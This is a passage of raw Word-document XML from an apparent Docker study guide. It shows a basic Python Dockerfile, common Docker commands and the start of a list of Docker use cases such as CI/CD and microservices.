    </w:p>
    <w:p w14:paraId="0B3E6142"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Write a Dockerfile</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Create a file named Dockerfile to specify the base image and steps to build your app.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7325C77D"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Build the Image</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use the docker build command to build an image from the Dockerfile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B62EE30"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Run a Container</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use the docker run command to run a container from the image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5870F1"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Share the Image</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Push the image to Docker Hub or any other repository for sharing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F1AEA8" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example of a Simple Dockerfile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C64C74"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 Use an official Python runtime as a parent image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306FEDDC"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FROM python:3.8-slim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5104E42B" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43B217E4"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 Set the working directory in the container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224B709A"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WORKDIR /app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432B9791" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A62646C"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 Copy the current directory contents into the container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB37FC4"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COPY . /app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203957D9" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52EBEAE9"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 Install any needed packages specified in requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9FC6A2"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RUN pip install --no-cache-dir -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F941475" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE1C404"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 Make port 5000 available to the world outside this container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56299C80"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EXPOSE 5000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1565CC8B" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D64B580"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 Define environment variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B93FADF"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ENV NAME World</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170BEACC" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F3B46E9"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 Run app.py when the container launches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601C3854"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CMD ["python", "app.py"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A9C6A2"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This Dockerfile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D35FFB4" w14:textId="13284A8F"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Uses an official Python image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9F87D7"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Sets the working directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222B08B7"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Copies the application code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FA2480"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Installs the required Python packages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02574268"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Exposes port 5000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689B4594"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Runs the app.py file when the container starts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C928A5" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Common Docker Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B28FF4E" w14:textId="677CE33B" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="00FA1B35"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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004435BE" w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>docker build -t my-image .: Builds a Docker image from the Dockerfile in the current directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED74A79"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docker run -p 4000:5000 my-image: Runs a container from the image my-image and maps port 5000 inside the container to port 4000 on the host machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4450D69A"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docker ps: Lists all running containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C45B932"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docker stop &lt;container_id&gt;: Stops a running container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DE988B" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>docker exec -it &lt;container_id&gt; /bin/bash: Opens a shell inside a running container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E891CEB" w14:textId="18A5ACDD" w:rsidR="00145166" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0014516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D2752F0">
          <v:rect id="_x0000_i3350" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58549418" w14:textId="4E66FB31" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="00504A73">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="833" w:name="_Toc196308313"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain use cases of Docker</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="833"/>
    </w:p>
    <w:p w14:paraId="6F4F4052" w14:textId="77FE30D9" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="006E34CD" w:rsidP="009156EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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xml:space="preserve">Docker has a wide range of </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-world use cases</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that solve common software development, deployment, and operations challenges. Here are the most common and powerful use cases of Docker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6380ED" w14:textId="77777777" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="00000000" w:rsidP="009156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720C38C">
          <v:rect id="_x0000_i3351" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A55D6BE" w14:textId="77777777" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="006E34CD" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🚀</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Simplified Application Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1C1E47"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Packaging an application with all dependencies into a container image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C248D0"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A Java Spring Boot app along with its JDK, configs, and libraries is packaged and deployed anywhere (dev, test, prod) without any compatibility issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6FFDD3"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Benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"Works on my machine"</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> problems are eliminated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26694C37" w14:textId="77777777" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="00000000" w:rsidP="009156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FAC194">
          <v:rect id="_x0000_i3352" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="309D952D" w14:textId="77777777" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="006E34CD" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. Test Automation &amp; CI/CD Pipelines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2870A5DB"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Running automated tests and builds in isolated environments using containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0497997B"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Jenkins pipeline running unit tests, integration tests, and deploying containers to a staging environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E7ABC5"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Benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consistent, fast, and reliable build/test environments across teams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B58539" w14:textId="77777777" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="00000000" w:rsidP="009156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4E11DF0">
          <v:rect id="_x0000_i3353" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC4C1B0" w14:textId="77777777" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="006E34CD" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🧳</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Microservices Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D473895"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Running multiple microservices independently in isolated containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20527616"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An e-commerce app with services like cart, inventory, order, and payment — each running in its own container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1688E82F"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Benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Easy scalability, individual service deployment, and isolation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4023C6" w14:textId="77777777" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="00000000" w:rsidP="009156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B464B7E">
          <v:rect id="_x0000_i3354" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A92E75" w14:textId="77777777" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="006E34CD" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🧑</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>‍</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>💻</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. Developer Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35681BF1"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lastRenderedPageBreak/>
        <w:t>Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spinning up a complete development environment using Docker Compose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7604B36E"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A developer clones a repo and runs docker-compose up to launch the app with PostgreSQL, Redis, and backend in seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D647CB9"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Benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Rapid onboarding and environment consistency across the team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03117F21" w14:textId="77777777" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="00000000" w:rsidP="009156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2CAE94D">
          <v:rect id="_x0000_i3355" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5146D820" w14:textId="77777777" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="006E34CD" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>📦</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
